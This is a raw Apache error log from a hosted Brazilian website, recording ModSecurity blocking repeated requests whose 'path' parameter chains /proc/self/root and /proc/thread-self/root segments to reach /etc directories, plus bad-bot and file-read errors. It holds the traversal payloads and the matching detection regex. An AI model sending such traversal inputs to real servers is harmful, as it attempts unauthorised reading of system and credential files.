"PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abru2sdf6f5d65gmYZQHKQAAAtM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 15:28:45.282927 2026] [:error] [pid 11816:tid 140411741927168] [client 74.7.243.128:54902] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abru3Ow_le52K8_3pV0NbQAAAgA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 15:29:36.634851 2026] [:error] [pid 15826:tid 140411607643904] [client 74.7.244.43:35048] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrvEOoXxyEfFpUF8f-nxAAAAVA"]
[Wed Mar 18 15:29:42.408658 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.228.61:52604] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrvFta6ubjKNq_cu4bPVwAAA1U"]
[Wed Mar 18 15:29:43.087747 2026] [:error] [pid 30077:tid 140411548894976] [client 74.7.243.128:54912] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrvF_u8EFLIOrSqIpszAAAAAlc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 15:29:51.911260 2026] [:error] [pid 15051:tid 140411565680384] [client 74.7.241.31:51176] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrvHymAPhZkrhU8w4mdKAAAAJU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 15:29:53.286278 2026] [:error] [pid 14269:tid 140411691570944] [client 74.7.241.31:60756] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrvIQbLMZ6AikZjR9XxqAAAAAY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 15:29:55.871613 2026] [:error] [pid 11816:tid 140411708356352] [client 74.7.241.31:60758] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrvI-w_le52K8_3pV0NtgAAAgQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 15:29:55.997783 2026] [mime_magic:error] [pid 11816:tid 140411641214720] (70014)End of file found: [client 216.73.216.191:62833] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 15:29:59.739028 2026] [mime_magic:error] [pid 15826:tid 140411607643904] (70014)End of file found: [client 216.73.216.191:41144] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 15:30:07.454116 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.241.31:38474] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrvL-oXxyEfFpUF8f-n2wAAAVg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 15:30:14.810198 2026] [:error] [pid 31803:tid 140411649607424] [client 74.7.241.31:57940] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrvNuyqAr6etmhZHNr7DwAAAEs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 15:30:40.172560 2026] [:error] [pid 30077:tid 140411708356352] [client 74.7.241.31:57954] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrvT_u8EFLIOrSqIpszKgAAAkQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:30:59.608695 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.243.128:38042] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrvY9a6ubjKNq_cu4bPzgAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 15:32:02.301834 2026] [mime_magic:error] [pid 15826:tid 140411708356352] (70014)End of file found: [client 57.141.18.107:58806] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 15:32:07.023722 2026] [:error] [pid 11816:tid 140411699963648] [client 74.7.243.128:37226] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrvp-w_le52K8_3pV0ObwAAAgU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 15:32:28.358980 2026] [mime_magic:error] [pid 14269:tid 140411590858496] (70014)End of file found: [client 57.141.18.11:59890] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 15:32:36.233797 2026] [mime_magic:error] [pid 11816:tid 140411540502272] (70014)End of file found: [client 57.141.18.47:60306] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 15:32:47.357877 2026] [mime_magic:error] [pid 17887:tid 140411540502272] (70014)End of file found: [client 57.141.18.42:60720] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 15:32:53.429534 2026] [:error] [pid 11816:tid 140411708356352] [client 74.7.241.31:35180] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrv1Ow_le52K8_3pV0OrAAAAgQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 15:32:53.432777 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.243.128:40552] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrv1Na6ubjKNq_cu4bQPAAAA00"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 15:32:57.210327 2026] [:error] [pid 15826:tid 140411641214720] [client 74.7.241.31:51722] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrv2eoXxyEfFpUF8f-obAAAAUw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 15:33:04.952559 2026] [:error] [pid 15051:tid 140411699963648] [client 74.7.243.128:59134] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrv4CmAPhZkrhU8w4mdkQAAAIU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 15:33:09.311580 2026] [mime_magic:error] [pid 29882:tid 140411540502272] (70014)End of file found: [client 57.141.18.12:33308] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 15:33:23.837687 2026] [:error] [pid 17653:tid 140411683178240] [client 74.7.241.31:59250] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrv88df6f5d65gmYZQIHgAAAsc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/run/initramfs/state/etc
[Wed Mar 18 15:33:26.202031 2026] [:error] [pid 17653:tid 140411607643904] [client 74.7.241.31:53032] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrv9sdf6f5d65gmYZQIIgAAAtA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 15:33:47.127402 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.241.31:44598] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrwC-oXxyEfFpUF8f-opAAAAUk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 15:34:04.679377 2026] [:error] [pid 14269:tid 140411565680384] [client 216.73.216.191:25984] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrwHAbLMZ6AikZjR9XyJQAAABU"]
[Wed Mar 18 15:34:09.882033 2026] [mime_magic:error] [pid 31803:tid 140411565680384] (70014)End of file found: [client 216.73.216.191:7469] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 15:34:27.627348 2026] [:error] [pid 29882:tid 140411557287680] [client 74.7.243.128:52728] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrwM0zinOy1jxa1j4dP3QAAARY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 15:34:33.289797 2026] [mime_magic:error] [pid 17653:tid 140411548894976] (70014)End of file found: [client 57.141.18.122:37084] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 15:34:38.672284 2026] [:error] [pid 31803:tid 140411599251200] [client 74.7.244.43:40378] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrwPuyqAr6etmhZHNr8RwAAAFE"]
